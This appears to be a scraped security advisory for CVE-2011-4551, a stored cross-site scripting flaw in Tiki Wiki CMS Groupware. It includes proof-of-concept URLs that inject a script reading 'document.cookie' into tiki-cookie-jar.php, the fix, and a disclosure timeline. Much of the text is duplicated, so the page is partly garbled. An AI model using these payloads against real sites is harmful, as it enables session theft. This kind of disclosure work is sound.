INFOSERVE-ADV2011-07 - Tiki Wiki CMS Groupware stored Cross-Site-Scripting
Advisory:
|
Tiki Wiki CMS Groupware Stored Cross-Site-Scripting
|
Advisory ID:
|
INFOSERVE-ADV2011-07
|
Author:
|
Stefan Schurtz
|
Contact:
|
|
Affected Software:
|
Successfully tested on Tiki 8.1 & 6.4 LTS (affects all current releases)
|
Vendor URL:
|
|
Vendor Status:
|
fixed
|
CVE-ID:
|
CVE-2011-4551
|
======================
Vulnerability Description
======================
All current releases of Tiki Wiki are prone to a stored XSS vulnerability
Vulnerability Description
======================
All current releases of Tiki Wiki are prone to a stored XSS vulnerability
==============
PoC-Exploit
==============
Tested with Firefox 7.01
"Visit" this URL
PoC-Exploit
==============
Tested with Firefox 7.01
"Visit" this URL
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss=</style></script><script>alert(document.cookie)</script> -> blank site
|
But when you visit one of this pages, the XSS will be executed
http://<target>/tiki-8.1/tiki-login.php
http://<target>/tiki-8.1/tiki-remind_password.php
// browser source code
show_errors: ‘y’,
xss: ‘</style></script><script>alert(document.cookie)</script>’
};
Another example:
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss1=</style></script><script>alert(document.cookie)</script>
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss2=</style></script><script>alert(document.cookie)</script>
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss3=</style></script><script>alert(document.cookie)</script>
All of them will be executed!
// browser source code
show_errors: ‘y’,
xss1: ‘</style></script><script>alert(document.cookie)</script>’,
xss2: ‘</style></script><script>alert(document.cookie)</script>’,
xss3: ‘</style></script><script>alert(document.cookie)</script>’
};
=====
Solution
=====
Upgrade to Tiki 8.2 or 6.5 LTS
================
Disclosure Timeline
================
16-Nov-2011 – informed Security Team (security@tikiwiki.org)
19-Dec-2011 – fixed by vendor
====
Credits
====
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
=======
References
=======
http://info.tiki.org/article183-Tiki-Wiki-CMS-Groupware-8-2-and-6-5LTS-Security-Patches-Available
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-07.txt
http://<target>/tiki-8.1/tiki-login.php
http://<target>/tiki-8.1/tiki-remind_password.php
// browser source code
show_errors: ‘y’,
xss: ‘</style></script><script>alert(document.cookie)</script>’
};
Another example:
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss1=</style></script><script>alert(document.cookie)</script>
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss2=</style></script><script>alert(document.cookie)</script>
http://<target>/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss3=</style></script><script>alert(document.cookie)</script>
All of them will be executed!
// browser source code
show_errors: ‘y’,
xss1: ‘</style></script><script>alert(document.cookie)</script>’,
xss2: ‘</style></script><script>alert(document.cookie)</script>’,
xss3: ‘</style></script><script>alert(document.cookie)</script>’
};
=====
Solution
=====
Upgrade to Tiki 8.2 or 6.5 LTS
================
Disclosure Timeline
================
16-Nov-2011 – informed Security Team (security@tikiwiki.org)
19-Dec-2011 – fixed by vendor
====
Credits
====
Vulnerabilitiy found and advisory written by the INFOSERVE security team.
=======
References
=======
http://info.tiki.org/article183-Tiki-Wiki-CMS-Groupware-8-2-and-6-5LTS-Security-Patches-Available
http://www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-07.txt
Comments
Display comments as Linear | Threaded